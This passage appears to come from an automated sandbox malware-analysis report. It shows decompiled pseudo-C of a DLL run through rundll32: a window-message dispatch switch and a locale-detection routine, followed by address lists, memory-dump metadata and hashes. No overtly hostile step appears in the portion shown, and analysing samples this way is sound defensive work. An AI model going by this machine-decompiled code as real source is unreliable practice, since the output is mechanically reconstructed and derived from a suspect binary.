                                                                                                        											 *(_t225 + 0x10) = _t195;
                                                                                                        											continue;
                                                                                                        										}
                                                                                                        										_push( *(_t225 + 8));
                                                                                                        										_push( *((intOrPtr*)(_t195 + 4)));
                                                                                                        										_t166 = E1000C64E();
                                                                                                        										__eflags = _t166;
                                                                                                        										 *(_t225 + 0x10) = _t166;
                                                                                                        										if(_t166 == 0) {
                                                                                                        											goto L36;
                                                                                                        										}
                                                                                                        										( *(_t225 - 0x18))[1] = _t166;
                                                                                                        										E1000D080(_t225 - 0x14);
                                                                                                        										L29:
                                                                                                        										_t213 =  *((intOrPtr*)( *(_t225 + 0x10) + 0x10)) - 1;
                                                                                                        										__eflags = _t213 - 0x44;
                                                                                                        										if(__eflags > 0) {
                                                                                                        											goto L106;
                                                                                                        										}
                                                                                                        										switch( *((intOrPtr*)(_t213 * 4 +  &M10010A14))) {
                                                                                                        											case 0:
                                                                                                        												_push( *(__ebp + 0xc));
                                                                                                        												_push(E10008F77(__ebx, __ecx, __edi, __esi, __eflags));
                                                                                                        												goto L44;
                                                                                                        											case 1:
                                                                                                        												_push( *(__ebp + 0xc));
                                                                                                        												goto L44;
                                                                                                        											case 2:
                                                                                                        												__eax = __esi;
                                                                                                        												__eax = __esi >> 0x10;
                                                                                                        												__eflags = __eax;
                                                                                                        												_push(__eax);
                                                                                                        												__eax = __si & 0x0000ffff;
                                                                                                        												_push(__si & 0x0000ffff);
                                                                                                        												__eax = E1000E5E5(__ebx, __ecx, __ebp,  *(__ebp + 0xc));
                                                                                                        												goto L49;
                                                                                                        											case 3:
                                                                                                        												_push(__esi);
                                                                                                        												__eax = E1000E5E5(__ebx, __ecx, __ebp,  *(__ebp + 0xc));
                                                                                                        												goto L42;
                                                                                                        											case 4:
                                                                                                        												_push(__esi);
                                                                                                        												L44:
                                                                                                        												__ecx = __edi;
                                                                                                        												__eax =  *__ebx();
                                                                                                        												goto L105;
                                                                                                        											case 5:
                                                                                                        												__ecx = __ebp - 0x28;
                                                                                                        												E1000899B(__ebp - 0x28) =  *(__esi + 4);
                                                                                                        												__ecx = __ebp - 0x7c;
                                                                                                        												 *((char*)(__ebp - 4)) = 1;
                                                                                                        												 *(__ebp - 0x24) =  *(__esi + 4);
                                                                                                        												__eax = E1000D09A(__ecx, __eflags);
                                                                                                        												__eax =  *__esi;
                                                                                                        												__esi =  *(__esi + 8);
                                                                                                        												 *((char*)(__ebp - 4)) = 2;
                                                                                                        												 *(__ebp - 0x5c) = __eax;
                                                                                                        												__eax = E1000E60C(__ecx, __edi, __esi, __eflags, __eax);
                                                                                                        												__eflags = __eax;
                                                                                                        												if(__eflags == 0) {
                                                                                                        													__eax =  *(__edi + 0x4c);
                                                                                                        													__eflags = __eax;
                                                                                                        													if(__eflags != 0) {
                                                                                                        														__ecx = __eax + 0x24;
                                                                                                        														__eax = E1002A233(__eax + 0x24, __edi, __esi,  *(__ebp - 0x5c));
                                                                                                        														__eflags = __eax;
                                                                                                        														if(__eflags != 0) {
                                                                                                        															 *(__ebp - 0x2c) = __eax;
                                                                                                        														}
                                                                                                        													}
                                                                                                        													__eax = __ebp - 0x7c;
                                                                                                        												}
                                                                                                        												_push(__esi);
                                                                                                        												_push(__eax);
                                                                                                        												__eax = __ebp - 0x28;
                                                                                                        												_push(__ebp - 0x28);
                                                                                                        												__ecx = __edi;
                                                                                                        												__eax =  *__ebx();
                                                                                                        												 *(__ebp - 0x24) =  *(__ebp - 0x24) & 0x00000000;
                                                                                                        												 *(__ebp - 0x5c) =  *(__ebp - 0x5c) & 0x00000000;
                                                                                                        												__ecx = __ebp - 0x7c;
                                                                                                        												 *(__ebp - 0x10) = __ebp - 0x28;
                                                                                                        												 *((char*)(__ebp - 4)) = 1;
                                                                                                        												__eax = E1000EED5(__ebx, __ebp - 0x7c, __edi, __esi, __eflags);
                                                                                                        												goto L59;
                                                                                                        											case 6:
                                                                                                        												__ecx = __ebp - 0x28;
                                                                                                        												E1000899B(__ebp - 0x28) =  *(__esi + 4);
                                                                                                        												_push( *(__esi + 8));
                                                                                                        												 *(__ebp - 0x24) =  *(__esi + 4);
                                                                                                        												__eax = __ebp - 0x28;
                                                                                                        												_push(__ebp - 0x28);
                                                                                                        												__ecx = __edi;
                                                                                                        												 *((char*)(__ebp - 4)) = 3;
                                                                                                        												__eax =  *__ebx();
                                                                                                        												_t95 = __ebp - 0x24;
                                                                                                        												 *_t95 =  *(__ebp - 0x24) & 0x00000000;
                                                                                                        												__eflags =  *_t95;
                                                                                                        												 *(__ebp - 0x10) = __ebp - 0x28;
                                                                                                        												L59:
                                                                                                        												__ecx = __ebp - 0x28;
                                                                                                        												 *((char*)(__ebp - 4)) = 0;
                                                                                                        												__eax = E10008FE9(__ecx);
                                                                                                        												goto L106;
                                                                                                        											case 7:
                                                                                                        												__eax =  *(__ebp + 0xc);
                                                                                                        												__eax =  *(__ebp + 0xc) >> 0x10;
                                                                                                        												__eflags = __eax;
                                                                                                        												_push(__eax);
                                                                                                        												__eax = E1000E5E5(__ebx, __ecx, __ebp, __esi);
                                                                                                        												goto L61;
                                                                                                        											case 8:
                                                                                                        												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
                                                                                                        												_push( *(__ebp + 0xc) >> 0x10);
                                                                                                        												__eax =  *(__ebp + 0xc) & 0x0000ffff;
                                                                                                        												goto L42;
                                                                                                        											case 9:
                                                                                                        												goto L103;
                                                                                                        											case 0xa:
                                                                                                        												_push(__esi);
                                                                                                        												_push(E1002AF88(__ebx, __ecx, __edi, __esi, __eflags));
                                                                                                        												__eax =  *(__ebp + 0xc);
                                                                                                        												__eax =  *(__ebp + 0xc) >> 0x10;
                                                                                                        												L61:
                                                                                                        												_push(__eax);
                                                                                                        												__eax =  *(__ebp + 0xc) & 0x0000ffff;
                                                                                                        												L49:
                                                                                                        												_push(__eax);
                                                                                                        												__ecx = __edi;
                                                                                                        												__eax =  *__ebx();
                                                                                                        												goto L105;
                                                                                                        											case 0xb:
                                                                                                        												_push(__esi);
                                                                                                        												goto L87;
                                                                                                        											case 0xc:
                                                                                                        												_push( *(__ebp + 0xc));
                                                                                                        												goto L90;
                                                                                                        											case 0xd:
                                                                                                        												__ecx = __edi;
                                                                                                        												__eax =  *__ebx();
                                                                                                        												goto L106;
                                                                                                        											case 0xe:
                                                                                                        												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
                                                                                                        												_push( *(__ebp + 0xc) >> 0x10);
                                                                                                        												__eax =  *(__ebp + 0xc) & 0x0000ffff;
                                                                                                        												goto L81;
                                                                                                        											case 0xf:
                                                                                                        												__esi = __esi >> 0x10;
                                                                                                        												__eax = __ax;
                                                                                                        												_push(__ax);
                                                                                                        												__eax = __si;
                                                                                                        												goto L81;
                                                                                                        											case 0x10:
                                                                                                        												_push(__esi >> 0x10);
                                                                                                        												__eax = __si & 0x0000ffff;
                                                                                                        												goto L95;
                                                                                                        											case 0x11:
                                                                                                        												_push(E1000E5E5(__ebx, __ecx, __ebp, __esi));
                                                                                                        												L87:
                                                                                                        												_push( *(__ebp + 0xc));
                                                                                                        												goto L88;
                                                                                                        											case 0x12:
                                                                                                        												__ecx = __edi;
                                                                                                        												__eax =  *__ebx();
                                                                                                        												goto L105;
                                                                                                        											case 0x13:
                                                                                                        												_push(E1000E5E5(__ebx, __ecx, __ebp,  *(__ebp + 0xc)));
                                                                                                        												_push(E1000E5E5(__ebx, __ecx, __ebp, __esi));
                                                                                                        												__eax = 0;
                                                                                                        												__eflags =  *((intOrPtr*)(__edi + 0x20)) - __esi;
                                                                                                        												__eax = 0 |  *((intOrPtr*)(__edi + 0x20)) == __esi;
                                                                                                        												goto L93;
                                                                                                        											case 0x14:
                                                                                                        												_push( *(__ebp + 0xc));
                                                                                                        												__eax = E10008F77(__ebx, __ecx, __edi, __esi, __eflags);
                                                                                                        												goto L76;
                                                                                                        											case 0x15:
                                                                                                        												_push( *(__ebp + 0xc));
                                                                                                        												__eax = E1002AF88(__ebx, __ecx, __edi, __esi, __eflags);
                                                                                                        												goto L76;
                                                                                                        											case 0x16:
                                                                                                        												__esi = __esi >> 0x10;
                                                                                                        												__eax = __ax;
                                                                                                        												_push(__ax);
                                                                                                        												__eax = __si;
                                                                                                        												_push(__si);
                                                                                                        												_push( *(__ebp + 0xc));
                                                                                                        												__eax = E1002AF88(__ebx, __ecx, __edi, __esi, __eflags);
                                                                                                        												goto L93;
                                                                                                        											case 0x17:
                                                                                                        												_push( *(__ebp + 0xc));
                                                                                                        												goto L75;
                                                                                                        											case 0x18:
                                                                                                        												_push(__esi);
                                                                                                        												L75:
                                                                                                        												__eax = E1000E5E5(__ebx, __ecx, __ebp);
                                                                                                        												L76:
                                                                                                        												_push(__eax);
                                                                                                        												goto L90;
                                                                                                        											case 0x19:
                                                                                                        												_push(__esi >> 0x10);
                                                                                                        												__eax = __si & 0x0000ffff;
                                                                                                        												goto L79;
                                                                                                        											case 0x1a:
                                                                                                        												__eax = __si;
                                                                                                        												__eflags = __esi;
                                                                                                        												__ecx = __si;
                                                                                                        												_push(__ecx);
                                                                                                        												L79:
                                                                                                        												_push(__eax);
                                                                                                        												__eax = E1000E5E5(__ebx, __ecx, __ebp,  *(__ebp + 0xc));
                                                                                                        												goto L93;
                                                                                                        											case 0x1b:
                                                                                                        												_push(__esi);
                                                                                                        												__eax = E1000E5E5(__ebx, __ecx, __ebp,  *(__ebp + 0xc));
                                                                                                        												L81:
                                                                                                        												_push(__eax);
                                                                                                        												goto L88;
                                                                                                        											case 0x1c:
                                                                                                        												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
                                                                                                        												_push( *(__ebp + 0xc) >> 0x10);
                                                                                                        												__eax = E1000E5E5(__ebx, __ecx, __ebp, __esi);
                                                                                                        												goto L92;
                                                                                                        											case 0x1d:
                                                                                                        												__ecx =  *(__ebp + 0xc);
                                                                                                        												__edx = __cx;
                                                                                                        												__ecx =  *(__ebp + 0xc) >> 0x10;
                                                                                                        												__eflags = __eax - 0x2a;
                                                                                                        												__ecx = __cx;
                                                                                                        												 *((intOrPtr*)(__ebp + 8)) = __edx;
                                                                                                        												 *(__ebp + 0xc) = __ecx;
                                                                                                        												if(__eax != 0x2a) {
                                                                                                        													_push(__ecx);
                                                                                                        													_push(__edx);
                                                                                                        													L88:
                                                                                                        													__ecx = __edi;
                                                                                                        													__eax =  *__ebx();
                                                                                                        													goto L106;
                                                                                                        												}
                                                                                                        												_push(E1000E5E5(__ebx, __ecx, __ebp, __esi));
                                                                                                        												_push( *(__ebp + 0xc));
                                                                                                        												_push( *((intOrPtr*)(__ebp + 8)));
                                                                                                        												goto L96;
                                                                                                        											case 0x1e:
                                                                                                        												_push(__esi);
                                                                                                        												L90:
                                                                                                        												__ecx = __edi;
                                                                                                        												__eax =  *__ebx();
                                                                                                        												goto L106;
                                                                                                        											case 0x1f:
                                                                                                        												_push(__esi);
                                                                                                        												_push( *(__ebp + 0xc));
                                                                                                        												__ecx = __edi;
                                                                                                        												__eax =  *__ebx();
                                                                                                        												goto L2;
                                                                                                        											case 0x20:
                                                                                                        												__eax = __si;
                                                                                                        												__eflags = __esi;
                                                                                                        												__ecx = __si;
                                                                                                        												_push(__ecx);
                                                                                                        												L42:
                                                                                                        												_push(__eax);
                                                                                                        												goto L104;
                                                                                                        											case 0x21:
                                                                                                        												__eax =  *(__ebp + 0xc);
                                                                                                        												_push(__esi);
                                                                                                        												__eax =  *(__ebp + 0xc) >> 0x10;
                                                                                                        												__eflags = __eax;
                                                                                                        												L92:
                                                                                                        												_push(__eax);
                                                                                                        												__eax =  *(__ebp + 0xc) & 0x0000ffff;
                                                                                                        												L93:
                                                                                                        												_push(__eax);
                                                                                                        												goto L96;
                                                                                                        											case 0x22:
                                                                                                        												__eax = __si;
                                                                                                        												__eflags = __esi;
                                                                                                        												__ecx = __si;
                                                                                                        												_push(__si);
                                                                                                        												L95:
                                                                                                        												_push(__eax);
                                                                                                        												_push( *(__ebp + 0xc));
                                                                                                        												L96:
                                                                                                        												__ecx = __edi;
                                                                                                        												__eax =  *__ebx();
                                                                                                        												goto L106;
                                                                                                        											case 0x23:
                                                                                                        												__eax = __si;
                                                                                                        												__esi = __esi >> 0x10;
                                                                                                        												__ecx = __si;
                                                                                                        												_push(__si);
                                                                                                        												_push(__si);
                                                                                                        												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
                                                                                                        												_push( *(__ebp + 0xc) >> 0x10);
                                                                                                        												__eax =  *(__ebp + 0xc) & 0x0000ffff;
                                                                                                        												_push( *(__ebp + 0xc) & 0x0000ffff);
                                                                                                        												__ecx = __edi;
                                                                                                        												__eax =  *__ebx();
                                                                                                        												 *(__ebp - 0x10) =  *(__ebp + 0xc) & 0x0000ffff;
                                                                                                        												L6:
                                                                                                        												__eflags = _t185;
                                                                                                        												if(_t185 != 0) {
                                                                                                        													goto L106;
                                                                                                        												}
                                                                                                        												goto L39;
                                                                                                        											case 0x24:
                                                                                                        												goto L106;
                                                                                                        											case 0x25:
                                                                                                        												__ecx = __edi;
                                                                                                        												__eax =  *__ebx();
                                                                                                        												__eflags = __eax;
                                                                                                        												 *(__ebp - 0x10) = __eax;
                                                                                                        												if(__eax == 0) {
                                                                                                        													goto L106;
                                                                                                        												}
                                                                                                        												L39:
                                                                                                        												 *(_t225 - 4) =  *(_t225 - 4) | 0xffffffff;
                                                                                                        												E1000D080(_t225 - 0x14);
                                                                                                        												_t163 = 0;
                                                                                                        												__eflags = 0;
                                                                                                        												goto L40;
                                                                                                        										}
                                                                                                        									}
                                                                                                        									_t170 =  *(_t225 - 0x18);
                                                                                                        									_t58 =  &(_t170[1]);
                                                                                                        									 *_t58 = _t170[1] & 0x00000000;
                                                                                                        									__eflags =  *_t58;
                                                                                                        									E1000D080(_t225 - 0x14);
                                                                                                        									goto L39;
                                                                                                        								}
                                                                                                        								_t173 = _t194;
                                                                                                        								__eflags =  *(_t225 + 0x10) - _t173[2];
                                                                                                        								if( *(_t225 + 0x10) != _t173[2]) {
                                                                                                        									goto L25;
                                                                                                        								}
                                                                                                        								_t196 = _t173[1];
                                                                                                        								 *(_t225 + 0x10) = _t196;
                                                                                                        								E1000D080(_t225 - 0x14);
                                                                                                        								__eflags = _t196;
                                                                                                        								if(_t196 == 0) {
                                                                                                        									goto L39;
                                                                                                        								}
                                                                                                        								__eflags =  *(_t225 + 8) - 0xc000;
                                                                                                        								if( *(_t225 + 8) < 0xc000) {
                                                                                                        									goto L29;
                                                                                                        								}
                                                                                                        								goto L102;
                                                                                                        							}
                                                                                                        							__eflags =  *(_t147 + 0x74);
                                                                                                        							if( *(_t147 + 0x74) <= 0) {
                                                                                                        								goto L20;
                                                                                                        							}
                                                                                                        							__eflags = _t189 - 0x200;
                                                                                                        							if(_t189 < 0x200) {
                                                                                                        								L16:
                                                                                                        								__eflags = _t189 - 0x100;
                                                                                                        								if(_t189 < 0x100) {
                                                                                                        									L18:
                                                                                                        									__eflags = _t189 - 0x281 - 0x10;
                                                                                                        									if(_t189 - 0x281 > 0x10) {
                                                                                                        										goto L20;
                                                                                                        									}
                                                                                                        									L19:
                                                                                                        									_t177 =  *((intOrPtr*)( *( *(_t222 + 0x4c)) + 0x94))(_t189,  *((intOrPtr*)(_t225 + 0xc)), _t224, _t225 - 0x10);
                                                                                                        									__eflags = _t177;
                                                                                                        									if(_t177 != 0) {
                                                                                                        										goto L106;
                                                                                                        									}
                                                                                                        									goto L20;
                                                                                                        								}
                                                                                                        								__eflags = _t189 - 0x10f;
                                                                                                        								if(_t189 <= 0x10f) {
                                                                                                        									goto L19;
                                                                                                        								}
                                                                                                        								goto L18;
                                                                                                        							}
                                                                                                        							__eflags = _t189 - 0x209;
                                                                                                        							if(_t189 <= 0x209) {
                                                                                                        								goto L19;
                                                                                                        							}
                                                                                                        							goto L16;
                                                                                                        						} else {
                                                                                                        							_t181 = E1000FF41(_t189, _t222, _t222, _t224, _t224 >> 0x10);
                                                                                                        							__eflags = _t181;
                                                                                                        							if(_t181 != 0) {
                                                                                                        								L2:
                                                                                                        								 *((intOrPtr*)(_t225 - 0x10)) = 1;
                                                                                                        								L106:
                                                                                                        								_t160 =  *((intOrPtr*)(_t225 + 0x14));
                                                                                                        								if(_t160 != 0) {
                                                                                                        									 *_t160 =  *((intOrPtr*)(_t225 - 0x10));
                                                                                                        								}
                                                                                                        								 *(_t225 - 4) =  *(_t225 - 4) | 0xffffffff;
                                                                                                        								E1000D080(_t225 - 0x14);
                                                                                                        								_t163 = 1;
                                                                                                        								L40:
                                                                                                        								return E1003EF21(_t163);
                                                                                                        							}
                                                                                                        							goto L12;
                                                                                                        						}
                                                                                                        					}
                                                                                                        					_t217 =  *(_t225 + 0x10);
                                                                                                        					__eflags =  *_t217;
                                                                                                        					if( *_t217 == 0) {
                                                                                                        						goto L39;
                                                                                                        					}
                                                                                                        					_push(_t225 - 0x10);
                                                                                                        					_push(_t217);
                                                                                                        					_push( *((intOrPtr*)(_t225 + 0xc)));
                                                                                                        					_t185 =  *((intOrPtr*)( *__ecx + 0xec))();
                                                                                                        					goto L6;
                                                                                                        				}
                                                                                                        				_push( *(_t225 + 0x10));
                                                                                                        				_push( *((intOrPtr*)(_t225 + 0xc)));
                                                                                                        				if( *((intOrPtr*)( *__ecx + 0xe8))() == 0) {
                                                                                                        					goto L39;
                                                                                                        				}
                                                                                                        				goto L2;
                                                                                                        			}

























                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10010853
                                                                                                        0x10010859
                                                                                                        0x1001085a
                                                                                                        0x1001085d
                                                                                                        0x10010839
                                                                                                        0x10010839
                                                                                                        0x1001083a
                                                                                                        0x10010770
                                                                                                        0x10010770
                                                                                                        0x10010771
                                                                                                        0x10010773
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10010960
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001086b
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10010862
                                                                                                        0x10010864
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10010876
                                                                                                        0x10010879
                                                                                                        0x1001087a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10010885
                                                                                                        0x10010888
                                                                                                        0x1001088b
                                                                                                        0x1001088c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10010899
                                                                                                        0x1001089a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10010758
                                                                                                        0x10010961
                                                                                                        0x10010961
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10010749
                                                                                                        0x1001074b
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100108aa
                                                                                                        0x100108b1
                                                                                                        0x100108b2
                                                                                                        0x100108b4
                                                                                                        0x100108b7
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100108bf
                                                                                                        0x100108c2
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100108c9
                                                                                                        0x100108cc
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100108d5
                                                                                                        0x100108d8
                                                                                                        0x100108db
                                                                                                        0x100108dc
                                                                                                        0x100108df
                                                                                                        0x100108e0
                                                                                                        0x100108e3
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100108ed
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100108f2
                                                                                                        0x100108f3
                                                                                                        0x100108f3
                                                                                                        0x100108f8
                                                                                                        0x100108f8
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10010900
                                                                                                        0x10010901
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10010906
                                                                                                        0x10010909
                                                                                                        0x1001090c
                                                                                                        0x1001090f
                                                                                                        0x10010910
                                                                                                        0x10010910
                                                                                                        0x10010914
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001091b
                                                                                                        0x1001091f
                                                                                                        0x10010924
                                                                                                        0x10010924
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001092a
                                                                                                        0x1001092d
                                                                                                        0x1001092f
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10010936
                                                                                                        0x10010939
                                                                                                        0x1001093c
                                                                                                        0x1001093f
                                                                                                        0x10010942
                                                                                                        0x10010945
                                                                                                        0x10010948
                                                                                                        0x1001094b
                                                                                                        0x1001095c
                                                                                                        0x1001095d
                                                                                                        0x10010964
                                                                                                        0x10010964
                                                                                                        0x10010966
                                                                                                        0x00000000
                                                                                                        0x10010966
                                                                                                        0x10010953
                                                                                                        0x10010954
                                                                                                        0x10010957
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001096d
                                                                                                        0x1001096e
                                                                                                        0x1001096e
                                                                                                        0x10010970
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10010997
                                                                                                        0x10010998
                                                                                                        0x1001099b
                                                                                                        0x1001099d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10010722
                                                                                                        0x10010725
                                                                                                        0x10010728
                                                                                                        0x1001072b
                                                                                                        0x1001072c
                                                                                                        0x1001072c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10010974
                                                                                                        0x10010977
                                                                                                        0x10010978
                                                                                                        0x10010978
                                                                                                        0x1001097b
                                                                                                        0x1001097b
                                                                                                        0x1001097c
                                                                                                        0x10010980
                                                                                                        0x10010980
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10010983
                                                                                                        0x10010986
                                                                                                        0x10010989
                                                                                                        0x1001098c
                                                                                                        0x1001098d
                                                                                                        0x1001098d
                                                                                                        0x1001098e
                                                                                                        0x10010991
                                                                                                        0x10010991
                                                                                                        0x10010993
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100109a4
                                                                                                        0x100109a7
                                                                                                        0x100109aa
                                                                                                        0x100109ad
                                                                                                        0x100109ae
                                                                                                        0x100109b2
                                                                                                        0x100109b5
                                                                                                        0x100109b6
                                                                                                        0x100109ba
                                                                                                        0x100109bb
                                                                                                        0x100109bd
                                                                                                        0x100109bf
                                                                                                        0x10010568
                                                                                                        0x10010568
                                                                                                        0x1001056a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100109c7
                                                                                                        0x100109c9
                                                                                                        0x100109cb
                                                                                                        0x100109cd
                                                                                                        0x100109d0
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001070c
                                                                                                        0x1001070c
                                                                                                        0x10010713
                                                                                                        0x10010718
                                                                                                        0x10010718
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100106af
                                                                                                        0x100106fd
                                                                                                        0x10010700
                                                                                                        0x10010700
                                                                                                        0x10010700
                                                                                                        0x10010707
                                                                                                        0x00000000
                                                                                                        0x10010707
                                                                                                        0x1001062f
                                                                                                        0x10010631
                                                                                                        0x10010634
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10010636
                                                                                                        0x1001063c
                                                                                                        0x1001063f
                                                                                                        0x10010644
                                                                                                        0x10010646
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001064c
                                                                                                        0x10010653
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10010655
                                                                                                        0x100105ad
                                                                                                        0x100105b1
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100105b3
                                                                                                        0x100105b9
                                                                                                        0x100105c3
                                                                                                        0x100105c3
                                                                                                        0x100105c9
                                                                                                        0x100105d3
                                                                                                        0x100105d9
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3
                                                                                                        • String ID:
                                                                                                        • API String ID: 431132790-0
                                                                                                        • Opcode ID: d11018b4642b23ca6353badaaefc791d62fc55ff40abd891af88606a4718e362
                                                                                                        • Instruction ID: da668afba43dcbf613a1531e198d6df2431545f57b1d6681437081d5cb9465c4
                                                                                                        • Opcode Fuzzy Hash: d11018b4642b23ca6353badaaefc791d62fc55ff40abd891af88606a4718e362
                                                                                                        • Instruction Fuzzy Hash: 36F1937460024AEFEB14CF54CC90ABE77A9FF04354F108519F895AF292DBB4EA81DB60
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 84%
                                                                                                        			E10026DFF(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                        				void* __ebp;
                                                                                                        				signed int _t73;
                                                                                                        				struct HINSTANCE__* _t78;
                                                                                                        				_Unknown_base(*)()* _t79;
                                                                                                        				struct HINSTANCE__* _t81;
                                                                                                        				signed int _t92;
                                                                                                        				signed int _t94;
                                                                                                        				unsigned int _t97;
                                                                                                        				void* _t113;
                                                                                                        				unsigned int _t115;
                                                                                                        				signed short _t123;
                                                                                                        				unsigned int _t124;
                                                                                                        				_Unknown_base(*)()* _t131;
                                                                                                        				signed short _t133;
                                                                                                        				unsigned int _t134;
                                                                                                        				intOrPtr _t143;
                                                                                                        				void* _t144;
                                                                                                        				int _t145;
                                                                                                        				int _t146;
                                                                                                        				signed int _t164;
                                                                                                        				void* _t167;
                                                                                                        				signed int _t169;
                                                                                                        				void* _t170;
                                                                                                        				int _t172;
                                                                                                        				signed int _t176;
                                                                                                        				void* _t177;
                                                                                                        				CHAR* _t181;
                                                                                                        				void* _t183;
                                                                                                        				void* _t184;
                                                                                                        
                                                                                                        				_t167 = __edx;
                                                                                                        				_t184 = _t183 - 0x118;
                                                                                                        				_t181 = _t184 - 4;
                                                                                                        				_t73 =  *0x10072650; // 0xb5e27fef
                                                                                                        				_t181[0x118] = _t73 ^ _t181;
                                                                                                        				_push(0x58);
                                                                                                        				E1003EE82(0x1005542e, __ebx, __edi, __esi);
                                                                                                        				_t169 = 0;
                                                                                                        				 *(_t181 - 0x40) = _t181[0x124];
                                                                                                        				 *(_t181 - 0x14) = 0;
                                                                                                        				 *(_t181 - 0x10) = 0;
                                                                                                        				_t78 = GetModuleHandleA("kernel32.dll");
                                                                                                        				 *(_t181 - 0x18) = _t78;
                                                                                                        				_t79 = GetProcAddress(_t78, "GetUserDefaultUILanguage");
                                                                                                        				if(_t79 == 0) {
                                                                                                        					if(GetVersion() >= 0) {
                                                                                                        						_t81 = GetModuleHandleA("ntdll.dll");
                                                                                                        						if(_t81 != 0) {
                                                                                                        							 *(_t181 - 0x14) = 0;
                                                                                                        							EnumResourceLanguagesA(_t81, 0x10, 1, 0x10026439, _t181 - 0x14);
                                                                                                        							if( *(_t181 - 0x14) != 0) {
                                                                                                        								_t97 =  *(_t181 - 0x14) & 0x0000ffff;
                                                                                                        								_t145 = _t97 & 0x3ff;
                                                                                                        								 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t97 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t145);
                                                                                                        								 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale(_t145);
                                                                                                        								 *(_t181 - 0x10) = 2;
                                                                                                        							}
                                                                                                        						}
                                                                                                        					} else {
                                                                                                        						 *(_t181 - 0x18) = 0;
                                                                                                        						if(RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019, _t181 - 0x18) == 0) {
                                                                                                        							 *(_t181 - 0x44) = 0x10;
                                                                                                        							if(RegQueryValueExA( *(_t181 - 0x18), 0, 0, _t181 - 0x20,  &(_t181[0x108]), _t181 - 0x44) == 0 &&  *(_t181 - 0x20) == 1) {
                                                                                                        								_t113 = E1003AA04( &(_t181[0x108]), "%x", _t181 - 0x1c);
                                                                                                        								_t184 = _t184 + 0xc;
                                                                                                        								if(_t113 == 1) {
                                                                                                        									 *(_t181 - 0x14) =  *(_t181 - 0x1c) & 0x0000ffff;
                                                                                                        									_t115 =  *(_t181 - 0x1c) & 0x0000ffff;
                                                                                                        									_t146 = _t115 & 0x3ff;
                                                                                                        									 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t115 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t146);
                                                                                                        									 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale(_t146);
                                                                                                        									 *(_t181 - 0x10) = 2;
                                                                                                        								}
                                                                                                        							}
                                                                                                        							RegCloseKey( *(_t181 - 0x18));
                                                                                                        						}
                                                                                                        					}
                                                                                                        				} else {
                                                                                                        					_t123 =  *_t79() & 0x0000ffff;
                                                                                                        					 *(_t181 - 0x14) = _t123;
                                                                                                        					_t124 = _t123 & 0x0000ffff;
                                                                                                        					_t164 = _t124 & 0x3ff;
